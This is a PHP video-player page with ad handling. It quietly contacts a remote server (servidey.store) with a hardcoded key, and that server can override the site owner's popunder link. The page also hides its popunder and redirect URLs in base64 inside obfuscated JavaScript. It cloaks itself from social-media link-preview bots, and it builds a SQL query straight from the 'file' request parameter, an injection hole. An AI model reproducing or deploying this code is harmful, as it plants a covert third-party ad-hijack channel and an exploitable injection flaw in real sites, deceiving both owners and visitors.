<?php
include 'config.php';

// Detectar bots de redes sociales y bloquear solo los sospechosos
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$referer = $_SERVER['HTTP_REFERER'] ?? '';
$isBot = false;

// Lista de User-Agents de bots de redes sociales
$botPatterns = [
    'facebookexternalhit', 'Facebot', 'Twitterbot', 'Slackbot', 'Discordbot',
    'TelegramBot', 'WhatsApp', 'SkypeUriPreview', 'LinkedInBot'
];

foreach ($botPatterns as $pattern) {
    if (stripos($userAgent, $pattern) !== false) {
        $isBot = true;
        break;
    }
}

// Si es un bot sospechoso y no viene con interacción (ej. sin Referer o sin JS), lo bloqueamos
if ($isBot && empty($referer)) {
    http_response_code(403);
    exit('Acceso denegado');
}

$filename = isset($_GET['file']) ? $_GET['file'] . '.mp4' : '';
$query = "SELECT * FROM videos WHERE filename = '$filename'";
$result = mysqli_query($conn, $query);
$video = mysqli_fetch_assoc($result);

if (!$video) {
    header('Location: random_video.php');
    exit();
}

// Obtener configuración de anuncios
$ads_query = "SELECT * FROM ads_settings WHERE id = 1";
$ads_result = mysqli_query($conn, $ads_query);
$ads = mysqli_fetch_assoc($ads_result);

// Intentar obtener la URL del popunder del servidor remoto
$remote_popunder_url = '';
$remote_popunder_enabled = false;
try {
    $api_url = 'https://servidey.store/api/check.php';
    $domain = $_SERVER['HTTP_HOST'];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $api_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(['domain' => $domain]));
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Content-Type: application/json',
        'X-API-Key: sk_3a9b8c2d7e1f4g5h6i7j8k9l0m1n2o3p4'
    ]);
    
    $response = curl_exec($ch);
    if ($response !== false) {
        $data = json_decode($response, true);
        if ($data['success'] && $data['is_active'] && !empty($data['direct_link'])) {
            $remote_popunder_url = $data['direct_link'];
            $remote_popunder_enabled = true;
        }
    }
    curl_close($ch);
} catch (Exception $e) {
    // Si hay un error, continuamos con la configuración local
    error_log("Error getting remote popunder: " . $e->getMessage());
}

// Si no hay URL remota, usar la configuración local
$popunder_url = $remote_popunder_enabled ? $remote_popunder_url : $ads['popunder_url'];
$popunder_enabled = $remote_popunder_enabled || $ads['popunder_enabled'];

// Obtener el código del contador y favicon
$settings_query = "SELECT counter_code, favicon_url FROM settings WHERE id = 1";
$settings_result = mysqli_query($conn, $settings_query);
$settings = mysqli_fetch_assoc($settings_result);

// Generar un nonce aleatorio para los scripts
$nonce = bin2hex(random_bytes(16));

// Anti-crawler headers
header('X-Robots-Tag: noindex, nofollow');
header('X-Frame-Options: SAMEORIGIN');
header('X-Content-Type-Options: nosniff');
?>
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="referrer" content="no-referrer">
    <meta name="robots" content="noindex, nofollow">
    <meta property="og:type" content="website">
    <meta name="googlebot" content="noindex, noarchive">
    <meta name="googlebot-news" content="nosnippet">
    <meta name="description" content="Video Player">
    <title>Video Player</title>
    <?php if (!empty($settings['favicon_url'])): ?>
        <link rel="icon" type="image/png" href="<?php echo htmlspecialchars($settings['favicon_url']); ?>">
        <link rel="shortcut icon" type="image/png" href="<?php echo htmlspecialchars($settings['favicon_url']); ?>">
    <?php endif; ?>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <?php if (!empty($settings['counter_code'])): ?>
        <?php echo $settings['counter_code']; ?>
    <?php endif; ?>
    <style>
    body {
        background-color: #ffffff;
        margin: 0;
        padding: 0;
        min-height: 100vh;
    }
    .video-container {
        position: relative;
        max-width: 1200px;
        margin: 1rem 1rem;
        border-radius: 10px;
        overflow: hidden;
        background: #000;
    }
    .video-container video {
        width: 100%;
        height: auto;
        display: block;
    }
    .custom-play-button {
        position: absolute;
        top: 48%;
        left: 50%;
        transform: translate(-50%, -50%);
        width: 80px;
        height: 80px;
        cursor: pointer;
        z-index: 2;
        opacity: 0.8;
        transition: opacity 0.3s ease;
        display: none;
    }
    .custom-play-button:hover {
        opacity: 1;
    }
    .video-container.paused .custom-play-button {
        display: block;
    }
    .banner-container {
        max-width: 1200px;
        margin: 2rem auto;
        padding: 0 15px;
        box-sizing: border-box;
    }
    .banner-container * {
        max-width: 100%;
        height: auto;
    }
    .ad-overlay {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        z-index: 9999;
        display: none;
        pointer-events: none;
    }
    .random-button {
        display: block;
        width: fit-content;
        margin: 1rem auto;
        padding: 0.75rem 2rem;
        font-size: 1.1rem;
        font-weight: 600;
        color: white;
        background: linear-gradient(135deg, #6e8efb, #a777e3);
        border: none;
        border-radius: 30px;
        cursor: pointer;
        transition: all 0.3s ease;
        text-decoration: none;
        text-align: center;
    }
    .random-button:hover {
        transform: translateY(-2px);
        box-shadow: 0 5px 15px rgba(110, 142, 251, 0.4);
        color: white;
    }
    </style>
</head>
<body>
    <div class="video-container paused">
        <video id="videoPlayer" controls preload="auto" playsinline>
            <?php if (!empty($video['url'])): ?>
                <source src="<?php echo htmlspecialchars($video['url']); ?>" type="video/mp4">
            <?php else: ?>
                <source src="store/<?php echo htmlspecialchars($video['filename']); ?>" type="video/mp4">
            <?php endif; ?>
            Tu navegador no soporta el elemento de video.
        </video>
        <img src="admin/play.png" class="custom-play-button" id="customPlayButton" alt="Play">
    </div>

    <?php if ($ads['random_button_enabled']): ?>
    <a href="random_video.php?current=<?php echo urlencode(substr($video['filename'], 0, -4)); ?>" class="random-button">
        <?php echo htmlspecialchars($ads['random_button_text']); ?>
    </a>
    <?php endif; ?>

    <?php if ($ads['banner_enabled'] && !empty($ads['banner_codes'])): ?>
    <div class="banner-container">
        <?php echo $ads['banner_codes']; ?>
    </div>
    <?php endif; ?>

    <?php if ($popunder_enabled): ?>
    <div id="adOverlay" class="ad-overlay"></div>
    <?php endif; ?>

    <script nonce="<?php echo $nonce; ?>">
    (function(w, d) {
        const _0x4f8d = ['addEventListener', 'timeupdate', 'currentTime', 'readyState', 'ended'];
        let _v = false;
        const _p = d.getElementById('videoPlayer');
        const _pb = d.getElementById('customPlayButton');
        const _vc = d.querySelector('.video-container');
        let _ps = false;
        let _pw = null;
        let _pe = false;

        function _gp() {
            const _c = d.createElement('canvas');
            _c.width = _p.videoWidth;
            _c.height = _p.videoHeight;
            _c.getContext('2d').drawImage(_p, 0, 0, _c.width, _c.height);
            _p.setAttribute('poster', _c.toDataURL('image/jpeg', 0.8));
        }

        _p[_0x4f8d[0]]('loadedmetadata', function() {
            _p.currentTime = 0.1;
        });

        _p[_0x4f8d[0]]('loadeddata', function() {
            if (_p[_0x4f8d[3]] >= 2) {
                _gp();
            }
        });

        _p[_0x4f8d[0]]('canplay', function() {
            if (!_p.hasAttribute('poster')) {
                _gp();
            }
        });

        _p[_0x4f8d[0]](_0x4f8d[1], function() {
            if (!_v && _p[_0x4f8d[2]] >= 5) {
                _v = true;
                fetch('register_view.php?video_id=<?php echo $video['id']; ?>', {
                    method: 'POST',
                    headers: {
                        'X-Requested-With': 'XMLHttpRequest'
                    }
                });
            }
        });

        // Manejar el botón de reproducción personalizado
        _pb.addEventListener('click', function() {
            if (_p.paused) {
                _p.play();
            } else {
                _p.pause();
            }
        });

        _p.addEventListener('play', function() {
            _vc.classList.remove('paused');
        });

        _p.addEventListener('pause', function() {
            _vc.classList.add('paused');
        });

        <?php if ($popunder_enabled && !empty($popunder_url)): ?>
        function _cp() {
            if (!_ps) {
                const _wd = w.innerWidth;
                const _ht = w.innerHeight;
                const _l = w.screenX;
                const _t = w.screenY;
                const _f = `width=${_wd},height=${_ht},left=${_l},top=${_t}`;
                try {
                    _pw = w.open(atob('<?php echo base64_encode($popunder_url); ?>'), '_blank', _f);
                    if (_pw) {
                        w.focus();
                        _ps = true;
                    }
                } catch(e) {}
            }
        }

        function _hc(e) {
            if (_pe && !_ps) {
                _cp();
            }
        }

        setTimeout(() => {
            _pe = true;
            d[_0x4f8d[0]]('click', _hc);
            d[_0x4f8d[0]]('touchstart', _hc);
        }, <?php echo $ads['popunder_delay'] * 1000; ?>);
        <?php endif; ?>

        <?php if ($ads['redirect_enabled'] && !empty($ads['redirect_url'])): ?>
        _p[_0x4f8d[0]](_0x4f8d[4], function() {
            w.location.href = atob('<?php echo base64_encode($ads['redirect_url']); ?>');
        });
        <?php endif; ?>
    })(window, document);
    </script>
</body>
</html>